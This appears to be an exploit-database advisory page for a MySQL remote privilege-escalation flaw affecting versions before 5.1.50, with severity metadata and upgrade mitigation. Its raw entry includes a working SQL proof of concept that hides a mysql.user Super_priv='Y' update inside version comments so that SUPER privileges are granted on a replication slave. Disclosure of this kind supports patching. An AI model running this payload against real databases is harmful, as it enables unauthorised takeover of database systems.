header-logo
Suggest Exploit
vendor:
MySQL Database Server
by:
Not specified
7.5
CVSS
HIGH
Remote Privilege Escalation
269
CWE
Product Name: MySQL Database Server
Affected Version From: Not specified
Affected Version To: MySQL versions prior to 5.1.50
Patch Exists: YES
Related CWE: Not specified
CPE: a:mysql:mysql
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Not specified

MySQL Remote Privilege Escalation Vulnerability

An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system, allowing them to compromise the affected database system.

Mitigation:

Upgrade to MySQL version 5.1.50 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43677/info

MySQL is prone to a remote privilege-escalation vulnerability.

An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system.

This issue affects versions prior to MySQL 5.1.50. 

UPDATE db1.tbl1 /*!514900 ,mysql.user */
SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'
WHERE mysql.user.User='user1'*/;

Navigation

Suggest Exploit

Services By CQR